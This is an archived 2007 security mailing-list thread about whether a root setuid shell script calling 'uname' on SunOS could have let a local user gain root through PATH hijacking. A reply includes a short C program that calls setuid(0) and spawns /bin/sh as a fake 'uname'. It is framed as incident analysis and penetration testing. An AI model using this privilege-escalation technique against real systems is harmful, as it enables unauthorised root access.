From: Nathan Sportsman (nsportsman@gmail.com)
Date: Sun Jul 01 2007 - 13:38:26 EDT
Just to be clear...the owner of your uname program is root and the
setuid bit is set on it right? chmod u=+s uname
try doing setuid(geteuid()) and see what effective user id the program
is actually being run as.
Thanks
Nathan Sportsman
On 7/1/07, Vitalik N. <robert.morris.jr@gmail.com> wrote:
> On 7/1/07, Thomas Pollet <thomas.pollet@gmail.com> wrote:
> > Hello,
> >
> > On 30/06/07, Vitalik N. <robert.morris.jr@gmail.com> wrote:
> > > Hi
> > >
> > > I was doing pen testing the other day and I found one root suid script
> > > left by some of the web developers:
> > >
> > > -rwsr-x--x 1 root users /home/web/c.cgi
> > >
> > > which is basically a bash script:
> > >
> > > ------ cut ------------
> > > #!/bin/sh
> > >
> > > uname
> > > ------ cut ------------
> > >
> > > And our system was recently compromised. Some local user was able to
> > > gain root access. Could this script be the way of gaining root access?
> > >
> > > According to http://www.unix.com/tips-and-tutorials/36711-the-whole-story-on-usr-bin-ksh.html
> > > "Because it was not possible to write a secure suid shell script, the concept
> > > of suid shell scripts was removed from Unix." But then it says "Solaris now
> > > supports suid shell" !
> > > I tried modifying the PATH variable and creating my own "uname" program.
> > > But my uname program runs with local user privs instead of root. I
> > > also tried the
> > did you put a setuid(0) in your uname program?
> >
> > f.i.:
> > cat >uname.c<<EOF
> > #include <unistd.h>
> > int main (int argc, char **argv, char **envp) {
> > setuid(0);
> > setgid(0);
> > execve("/bin/sh",argv,envp);
> > }
> > EOF
> >
> > > other attack described in the link above: "link to -i" but this didn't
> > > work as well.
> > > So could this script be the problem?
> > >
> > > P.S: The machine runs SunOS 5.6 with all updates
> >
> > Regards,
> > Thomas Pollet
> >
>
> Yes, my uname programs was exactly the same. But I used execl call instead
> of execve (don't think that would make any difference). I also tried
> setting euid
> (seteuid(0)).
> Using a bash script for "uname" program didn't work either:
>
> % cat uname
> #!/bin/sh
> touch /tmp/test
> chown root /tmp/test
>
> the script complains about privileges and can't execute chown.
>
> ------------------------------------------------------------------------
> This List Sponsored by: Cenzic
>
> Swap Out your SPI or Watchfire app sec solution for
> Cenzic's robust, accurate risk assessment and management
> solution FREE - limited Time Offer
>
> http://www.cenzic.com/wf-spi
> ------------------------------------------------------------------------
>
>
------------------------------------------------------------------------
This List Sponsored by: Cenzic
Swap Out your SPI or Watchfire app sec solution for
Cenzic's robust, accurate risk assessment and management
solution FREE - limited Time Offer
http://www.cenzic.com/wf-spi
------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:55 EDT